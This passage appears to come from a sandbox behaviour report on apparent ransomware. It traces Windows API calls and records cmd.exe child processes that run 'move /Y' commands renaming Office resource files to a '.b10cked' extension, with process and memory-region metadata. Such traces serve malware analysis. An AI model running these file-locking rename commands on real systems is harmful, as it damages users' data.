lpcbData=0x26ea40*=0x4) returned 0x0 [0173.564] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x26ea44, lpData=0x26ea48, lpcbData=0x26ea40*=0x1000 | out: lpType=0x26ea44*=0x4, lpData=0x26ea48*=0x9, lpcbData=0x26ea40*=0x4) returned 0x0 [0173.564] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x26ea44, lpData=0x26ea48, lpcbData=0x26ea40*=0x1000 | out: lpType=0x26ea44*=0x0, lpData=0x26ea48*=0x9, lpcbData=0x26ea40*=0x1000) returned 0x2 [0173.564] RegCloseKey (hKey=0x40) returned 0x0 [0173.564] time (in: timer=0x0 | out: timer=0x0) returned 0x5b886389 [0173.564] srand (_Seed=0x5b886389) [0173.564] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\SGRESD~1.TRX\" \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\SGRES.DLL.trx_dll.b10cked\"" [0173.565] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\SGRESD~1.TRX\" \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\SGRES.DLL.trx_dll.b10cked\"" [0173.565] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0173.565] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x351970, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe")) returned 0x1b [0173.565] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0173.565] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0173.565] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0173.565] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0173.565] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0173.565] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0173.565] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0173.565] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0173.565] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0173.565] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0173.565] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0173.565] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0173.566] GetEnvironmentStringsW () returned 0x352360* [0173.566] FreeEnvironmentStringsW (penv=0x352360) returned 1 [0173.566] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0173.566] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0173.566] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0173.566] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0173.566] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0173.566] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0173.566] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0173.566] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0173.566] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0173.566] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0173.566] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x26f808 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0173.566] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", nBufferLength=0x104, lpBuffer=0x26f808, lpFilePart=0x26f804 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop", lpFilePart=0x26f804*="Desktop") returned 0x18 [0173.566] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0173.566] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x26f584 | out: lpFindFileData=0x26f584) returned 0x3509f0 [0173.566] FindClose (in: hFindFile=0x3509f0 | out: hFindFile=0x3509f0) returned 1 [0173.566] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5", lpFindFileData=0x26f584 | out: lpFindFileData=0x26f584) returned 0x3509f0 [0173.567] FindClose (in: hFindFile=0x3509f0 | out: hFindFile=0x3509f0) returned 1 [0173.567] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", lpFindFileData=0x26f584 | out: lpFindFileData=0x26f584) returned 0x3509f0 [0173.567] FindClose (in: hFindFile=0x3509f0 | out: hFindFile=0x3509f0) returned 1 [0173.567] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0173.567] SetCurrentDirectoryW (lpPathName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 1 [0173.567] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\EEBsYm5\\Desktop") returned 1 [0173.567] GetEnvironmentStringsW () returned 0x350210* [0173.567] FreeEnvironmentStringsW (penv=0x350210) returned 1 [0173.567] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0173.568] GetConsoleOutputCP () returned 0x1b5 [0173.568] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0173.568] GetUserDefaultLCID () returned 0x409 [0173.568] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x4a9e4950, cchData=8 | out: lpLCData=":") returned 2 [0173.568] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x26f948, cchData=128 | out: lpLCData="0") returned 2 [0173.568] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x26f948, cchData=128 | out: lpLCData="0") returned 2 [0173.568] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x26f948, cchData=128 | out: lpLCData="1") returned 2 [0173.568] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x4a9e4940, cchData=8 | out: lpLCData="/") returned 2 [0173.568] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x4a9e4d80, cchData=32 | out: lpLCData="Mon") returned 4 [0173.568] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x4a9e4d40, cchData=32 | out: lpLCData="Tue") returned 4 [0173.568] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x4a9e4d00, cchData=32 | out: lpLCData="Wed") returned 4 [0173.568] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x4a9e4cc0, cchData=32 | out: lpLCData="Thu") returned 4 [0173.568] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x4a9e4c80, cchData=32 | out: lpLCData="Fri") returned 4 [0173.568] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x4a9e4c40, cchData=32 | out: lpLCData="Sat") returned 4 [0173.568] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x4a9e4c00, cchData=32 | out: lpLCData="Sun") returned 4 [0173.568] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x4a9e4930, cchData=8 | out: lpLCData=".") returned 2 [0173.569] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x4a9e4920, cchData=8 | out: lpLCData=",") returned 2 [0173.569] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0173.569] GetConsoleTitleW (in: lpConsoleTitle=0x340930, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0173.570] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0173.570] GetProcAddress (hModule=0x76910000, lpProcName="CopyFileExW") returned 0x7694ac6c [0173.570] GetProcAddress (hModule=0x76910000, lpProcName="IsDebuggerPresent") returned 0x76953ea8 [0173.570] GetProcAddress (hModule=0x76910000, lpProcName="SetConsoleInputExeNameW") returned 0x76962732 [0173.570] _wcsicmp (_String1="move", _String2=")") returned 68 [0173.570] _wcsicmp (_String1="FOR", _String2="move") returned -7 [0173.570] _wcsicmp (_String1="FOR/?", _String2="move") returned -7 [0173.570] _wcsicmp (_String1="IF", _String2="move") returned -4 [0173.570] _wcsicmp (_String1="IF/?", _String2="move") returned -4 [0173.570] _wcsicmp (_String1="REM", _String2="move") returned 5 [0173.571] _wcsicmp (_String1="REM/?", _String2="move") returned 5 [0173.574] GetConsoleTitleW (in: lpConsoleTitle=0x26f640, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0173.574] _wcsicmp (_String1="move", _String2="DIR") returned 9 [0173.574] _wcsicmp (_String1="move", _String2="ERASE") returned 8 [0173.574] _wcsicmp (_String1="move", _String2="DEL") returned 9 [0173.574] _wcsicmp (_String1="move", _String2="TYPE") returned -7 [0173.575] _wcsicmp (_String1="move", _String2="COPY") returned 10 [0173.575] _wcsicmp (_String1="move", _String2="CD") returned 10 [0173.575] _wcsicmp (_String1="move", _String2="CHDIR") returned 10 [0173.575] _wcsicmp (_String1="move", _String2="RENAME") returned -5 [0173.575] _wcsicmp (_String1="move", _String2="REN") returned -5 [0173.575] _wcsicmp (_String1="move", _String2="ECHO") returned 8 [0173.575] _wcsicmp (_String1="move", _String2="SET") returned -6 [0173.575] _wcsicmp (_String1="move", _String2="PAUSE") returned -3 [0173.575] _wcsicmp (_String1="move", _String2="DATE") returned 9 [0173.575] _wcsicmp (_String1="move", _String2="TIME") returned -7 [0173.575] _wcsicmp (_String1="move", _String2="PROMPT") returned -3 [0173.575] _wcsicmp (_String1="move", _String2="MD") returned 11 [0173.575] _wcsicmp (_String1="move", _String2="MKDIR") returned 4 [0173.575] _wcsicmp (_String1="move", _String2="RD") returned -5 [0173.575] _wcsicmp (_String1="move", _String2="RMDIR") returned -5 [0173.575] _wcsicmp (_String1="move", _String2="PATH") returned -3 [0173.575] _wcsicmp (_String1="move", _String2="GOTO") returned 6 [0173.575] _wcsicmp (_String1="move", _String2="SHIFT") returned -6 [0173.575] _wcsicmp (_String1="move", _String2="CLS") returned 10 [0173.575] _wcsicmp (_String1="move", _String2="CALL") returned 10 [0173.575] _wcsicmp (_String1="move", _String2="VERIFY") returned -9 [0173.575] _wcsicmp (_String1="move", _String2="VER") returned -9 [0173.575] _wcsicmp (_String1="move", _String2="VOL") returned -9 [0173.575] _wcsicmp (_String1="move", _String2="EXIT") returned 8 [0173.575] _wcsicmp (_String1="move", _String2="SETLOCAL") returned -6 [0173.575] _wcsicmp (_String1="move", _String2="ENDLOCAL") returned 8 [0173.575] _wcsicmp (_String1="move", _String2="TITLE") returned -7 [0173.575] _wcsicmp (_String1="move", _String2="START") returned -6 [0173.575] _wcsicmp (_String1="move", _String2="DPATH") returned 9 [0173.575] _wcsicmp (_String1="move", _String2="KEYS") returned 2 [0173.575] _wcsicmp (_String1="move", _String2="MOVE") returned 0 [0173.577] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0173.577] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0173.577] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x26f3fc, nVolumeNameSize=0x104, lpVolumeSerialNumber=0x26f3f4, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x26f3f4*=0x90c08a66, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0173.578] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0173.578] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0173.578] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0173.578] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0173.578] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0173.578] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0173.578] _wcsnicmp (_String1="COPYCMD", _String2="FP_NO_H", _MaxCount=0x7) returned -3 [0173.578] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0173.578] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0173.578] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0173.578] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0173.578] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0173.578] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0173.578] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0173.578] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0173.578] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0173.578] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0173.578] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0173.578] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0173.578] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0173.578] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0173.578] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0173.578] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0173.578] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0173.578] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0173.578] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0173.578] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0173.578] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0173.578] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0173.578] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0173.578] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0173.578] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0173.579] _wcsnicmp (_String1="/Y", _String2="/Y", _MaxCount=0x2) returned 0 [0173.579] _wcsicmp (_String1="SGRESD~1.TRX", _String2=".") returned 69 [0173.579] _wcsicmp (_String1="SGRESD~1.TRX", _String2="..") returned 69 [0173.579] GetFileAttributesW (lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\SGRESD~1.TRX" (normalized: "c:\\users\\alluse~1\\micros~1\\office\\uicapt~1\\3082\\sgresd~1.trx")) returned 0x2020 [0173.579] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x351f18 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0173.579] SetErrorMode (uMode=0x0) returned 0x0 [0173.579] SetErrorMode (uMode=0x1) returned 0x0 [0173.579] GetFullPathNameW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\SGRESD~1.TRX", nBufferLength=0x104, lpBuffer=0x26ed84, lpFilePart=0x26ed6c | out: lpBuffer="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\SGRESD~1.TRX", lpFilePart=0x26ed6c*="SGRESD~1.TRX") returned 0x3c [0173.579] SetErrorMode (uMode=0x0) returned 0x1 [0173.579] GetFileAttributesW (lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082" (normalized: "c:\\users\\alluse~1\\micros~1\\office\\uicapt~1\\3082")) returned 0x2012 [0173.579] _wcsicmp (_String1="SGRESD~1.TRX", _String2=".") returned 69 [0173.579] _wcsicmp (_String1="SGRESD~1.TRX", _String2="..") returned 69 [0173.580] GetFileAttributesW (lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\SGRESD~1.TRX" (normalized: "c:\\users\\alluse~1\\micros~1\\office\\uicapt~1\\3082\\sgresd~1.trx")) returned 0x2020 [0173.580] SetErrorMode (uMode=0x0) returned 0x0 [0173.580] SetErrorMode (uMode=0x1) returned 0x0 [0173.580] GetFullPathNameW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\SGRESD~1.TRX", nBufferLength=0x104, lpBuffer=0x26f200, lpFilePart=0x26ef98 | out: lpBuffer="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\SGRESD~1.TRX", lpFilePart=0x26ef98*="SGRESD~1.TRX") returned 0x3c [0173.580] SetErrorMode (uMode=0x0) returned 0x1 [0173.580] SetErrorMode (uMode=0x0) returned 0x0 [0173.580] SetErrorMode (uMode=0x1) returned 0x0 [0173.580] GetFullPathNameW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\SGRES.DLL.trx_dll.b10cked", nBufferLength=0x104, lpBuffer=0x26f408, lpFilePart=0x26ef98 | out: lpBuffer="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\SGRES.DLL.trx_dll.b10cked", lpFilePart=0x26ef98*="SGRES.DLL.trx_dll.b10cked") returned 0x49 [0173.580] SetErrorMode (uMode=0x0) returned 0x1 [0173.580] SetLastError (dwErrCode=0x0) [0173.580] GetFileAttributesW (lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\SGRES.DLL.trx_dll.b10cked" (normalized: "c:\\users\\alluse~1\\micros~1\\office\\uicapt~1\\3082\\sgres.dll.trx_dll.b10cked")) returned 0xffffffff [0173.580] GetLastError () returned 0x2 [0173.580] FindFirstFileExW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\SGRESD~1.TRX", fInfoLevelId=0x1, lpFindFileData=0x26e914, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x26e914) returned 0x352128 [0173.580] FindNextFileW (in: hFindFile=0x352128, lpFindFileData=0x26e914 | out: lpFindFileData=0x26e914) returned 0 [0173.581] GetLastError () returned 0x12 [0173.581] FindClose (in: hFindFile=0x352128 | out: hFindFile=0x352128) returned 1 [0173.582] FindFirstFileExW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\SGRESD~1.TRX", fInfoLevelId=0x1, lpFindFileData=0x351cb8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x351cb8) returned 0x352128 [0173.582] GetFullPathNameW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\SGRES.DLL.trx_dll.b10cked", nBufferLength=0x104, lpBuffer=0x26ebac, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\SGRES.DLL.trx_dll.b10cked", lpFilePart=0x0) returned 0x49 [0173.582] GetFullPathNameW (in: lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\SGRES.DLL.trx_dll", nBufferLength=0x104, lpBuffer=0x26ebac, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\SGRES.DLL.trx_dll", lpFilePart=0x0) returned 0x41 [0173.582] GetFileAttributesW (lpFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\SGRES.DLL.trx_dll" (normalized: "c:\\users\\alluse~1\\micros~1\\office\\uicapt~1\\3082\\sgres.dll.trx_dll")) returned 0x2020 [0173.582] MoveFileExW (lpExistingFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\SGRES.DLL.trx_dll" (normalized: "c:\\users\\alluse~1\\micros~1\\office\\uicapt~1\\3082\\sgres.dll.trx_dll"), lpNewFileName="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\SGRES.DLL.trx_dll.b10cked" (normalized: "c:\\users\\alluse~1\\micros~1\\office\\uicapt~1\\3082\\sgres.dll.trx_dll.b10cked"), dwFlags=0x3) returned 1 [0173.583] FindClose (in: hFindFile=0x352128 | out: hFindFile=0x352128) returned 1 [0173.583] _vsnwprintf (in: _Buffer=0x4a9e5040, _BufferCount=0x103, _Format="%9d", _ArgList=0x26eb60 | out: _Buffer=" 1") returned 9 [0173.583] _get_osfhandle (_FileHandle=1) returned 0x7 [0173.583] GetFileType (hFile=0x7) returned 0x2 [0173.589] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0173.589] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x26eaec | out: lpMode=0x26eaec) returned 1 [0173.589] _get_osfhandle (_FileHandle=1) returned 0x7 [0173.589] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x26eb20 | out: lpConsoleScreenBufferInfo=0x26eb20) returned 1 [0173.590] FormatMessageW (in: dwFlags=0x1a00, lpSource=0x0, dwMessageId=0x236e, dwLanguageId=0x0, lpBuffer=0x4a9f4640, nSize=0x2000, Arguments=0x0 | out: lpBuffer="%1 file(s) moved.\r\n") returned 0x13 [0173.590] FormatMessageW (in: dwFlags=0x1800, lpSource=0x0, dwMessageId=0x236e, dwLanguageId=0x0, lpBuffer=0x4a9f4640, nSize=0x2000, Arguments=0x26eb60 | out: lpBuffer=" 1 file(s) moved.\r\n") returned 0x1a [0173.590] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x4a9f4640*, nNumberOfCharsToWrite=0x1a, lpNumberOfCharsWritten=0x26eb44, lpReserved=0x0 | out: lpBuffer=0x4a9f4640*, lpNumberOfCharsWritten=0x26eb44*=0x1a) returned 1 [0173.590] _get_osfhandle (_FileHandle=1) returned 0x7 [0173.591] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0173.591] _get_osfhandle (_FileHandle=1) returned 0x7 [0173.591] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0173.591] _get_osfhandle (_FileHandle=0) returned 0x3 [0173.591] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0173.591] SetConsoleInputExeNameW () returned 0x1 [0173.591] GetConsoleOutputCP () returned 0x1b5 [0173.591] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0173.591] SetThreadUILanguage (LangId=0x0) returned 0x409 [0173.591] exit (_Code=0) Process: id = "303" image_name = "cmd.exe" filename = "c:\\windows\\system32\\cmd.exe" page_root = "0x7ea167e0" os_pid = "0xac0" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "9" os_parent_pid = "0xaec" cmd_line = "\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\STINTL~1.TRX\" \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\STINTL.DLL.trx_dll.b10cked\"" cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 23624 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 23625 start_va = 0x30000 end_va = 0x12ffff entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 23626 start_va = 0x130000 end_va = 0x133fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000130000" filename = "" Region: id = 23627 start_va = 0x140000 end_va = 0x140fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000140000" filename = "" Region: id = 23628 start_va = 0x4a9c0000 end_va = 0x4aa0bfff entry_point = 0x4a9c0000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\System32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe") Region: id = 23629 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 23630 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 23631 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 23632 start_va = 0x7ffdd000 end_va = 0x7ffddfff entry_point = 0x0 region_type = private name = "private_0x000000007ffdd000" filename = "" Region: id = 23633 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 23766 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 23767 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 23768 start_va = 0x1a0000 end_va = 0x29ffff entry_point = 0x0 region_type = private name = "private_0x00000000001a0000" filename = "" Region: id = 23769 start_va = 0x2a0000 end_va = 0x306fff entry_point = 0x2a0000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 23770 start_va = 0x410000 end_va = 0x41ffff entry_point = 0x0 region_type = private name = "private_0x0000000000410000" filename = "" Region: id = 23771 start_va = 0x6ee80000 end_va = 0x6ee86fff entry_point = 0x6ee80000 region_type = mapped_file name = "winbrand.dll" filename = "\\Windows\\System32\\winbrand.dll" (normalized: "c:\\windows\\system32\\winbrand.dll") Region: id = 23772 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 23773 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 23774 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 23775 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = 